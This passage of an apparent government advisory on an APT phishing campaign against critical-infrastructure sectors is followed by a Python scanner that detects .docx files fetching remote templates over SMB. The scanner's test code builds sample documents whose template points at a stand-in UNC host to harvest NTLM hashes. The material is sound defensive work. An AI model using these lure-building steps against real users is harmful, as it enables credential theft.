Historically, threat actors have also targeted other critical infrastructure sectors with similar campaigns.
Analysis by DHS, FBI, and trusted partners has identified distinct indicators and behaviors related to this activity.
This alert provides information on advanced persistent threat (APT) actions targeting government entities and organizations in the energy, nuclear, water, aviation, and critical manufacturing sectors. This report contains indicators of compromise (IOCs) and technical details on the tactics, techniques, and procedures (TTPs) used by APT actors on compromised victims' networks.

DHS leveraged the Cyber Kill Chain model to analyze, discuss, and dissect malicious cyber activity.

Stage 2: Weaponization

Throughout the spear-phishing campaign, threat actors used email attachments to leverage legitimate Microsoft Office functions to retrieve a document from a remote server using the Server Message Block (SMB) protocol. (An example of this request is: file[:]///Normal.dotm.)

The threat actors use the staging targets' networks as pivot points and malware repositories when targeting their final intended victims. The ultimate objective of the cyber threat actors is to compromise organizational networks, which are referred to throughout this alert as the "intended target."

The threat actors in this campaign employed a variety of TTPs, including:
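As an added detection example (not part of the alert), the Python below scans a .docx attachment for the remote-template relationship that makes Word fetch a template such as Normal.dotm over SMB. It assumes the weaponized document carries an attachedTemplate relationship in word/_rels/settings.xml.rels with TargetMode="External" and a file: or UNC target, which is the standard OOXML way to attach a remote template (the alert excerpt above does not spell out the relationship part). Because a Windows client authenticates to the SMB server before the file is returned, such a request can hand the user's NTLM credential hash to the attacker-controlled host, so the target is worth flagging at the mail gateway even when the document contains no macro. The sample documents and the address 203.0.113.5 (RFC 5737 test range) are constructed here for the demonstration.

```python
import io
import re
import zipfile
from xml.etree import ElementTree as ET

# OOXML package relationship namespace and the base of the relationship-type URIs.
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_TYPE_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

# Targets a Windows client resolves over SMB: file: URIs and UNC paths (\\host\share).
SMB_TARGET = re.compile(r"(?i)^(file:|\\\\)")


def find_remote_templates(docx_bytes):
    """Scan every relationship part (*.rels) in a .docx for External
    relationships whose Target would be fetched over SMB.
    Returns a list of (rels_part, relationship_type, target) tuples."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                # Internal relationships (word/document.xml, ...) never leave the file.
                if rel.get("TargetMode") != "External":
                    continue
                target = rel.get("Target", "")
                if SMB_TARGET.match(target):
                    rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    hits.append((name, rel_type, target))
    return hits


def _rels(body):
    return ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            f'<Relationships xmlns="{REL_NS}">{body}</Relationships>')


def build_sample_docx(template_target=None):
    """Construct a minimal .docx in memory (constructed test input, not a real
    sample). If template_target is given, settings.xml gets an attachedTemplate
    relationship pointing at it, which is how a document asks Word to load a
    remote template when it is opened."""
    content_types = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="xml" ContentType="application/xml"/>'
        '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
        '<Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/>'
        '</Types>')
    document = (f'<w:document xmlns:w="{W_NS}"><w:body><w:p><w:r>'
                '<w:t>Please review the attached invoice.</w:t>'
                '</w:r></w:p></w:body></w:document>')
    settings = (f'<w:settings xmlns:w="{W_NS}" xmlns:r="{REL_TYPE_BASE[:-1]}">'
                + ('<w:attachedTemplate r:id="rId1"/>' if template_target else '')
                + '</w:settings>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("_rels/.rels", _rels(
            f'<Relationship Id="rId1" Type="{REL_TYPE_BASE}officeDocument" Target="word/document.xml"/>'))
        z.writestr("word/document.xml", document)
        # An external https hyperlink is ordinary and must not be flagged.
        z.writestr("word/_rels/document.xml.rels", _rels(
            f'<Relationship Id="rId1" Type="{REL_TYPE_BASE}settings" Target="settings.xml"/>'
            f'<Relationship Id="rId2" Type="{REL_TYPE_BASE}hyperlink" '
            'Target="https://example.com/" TargetMode="External"/>'))
        z.writestr("word/settings.xml", settings)
        if template_target:
            z.writestr("word/_rels/settings.xml.rels", _rels(
                f'<Relationship Id="rId1" Type="{REL_TYPE_BASE}attachedTemplate" '
                f'Target="{template_target}" TargetMode="External"/>'))
    return buf.getvalue()


if __name__ == "__main__":
    samples = [
        ("clean", build_sample_docx()),
        ("file-uri", build_sample_docx("file://203.0.113.5/share/Normal.dotm")),
        ("unc", build_sample_docx(r"\\203.0.113.5\share\Normal.dotm")),
    ]
    for label, doc in samples:
        print(label, find_remote_templates(doc) or "no remote template reference")
```

The scanner walks every .rels part rather than only settings.xml.rels, so it also catches the same SMB targets placed in other relationship types (for example an external hyperlink or image target pointing at a UNC path); only the External/file-or-UNC combination is reported, so documents that merely link to an https URL pass cleanly.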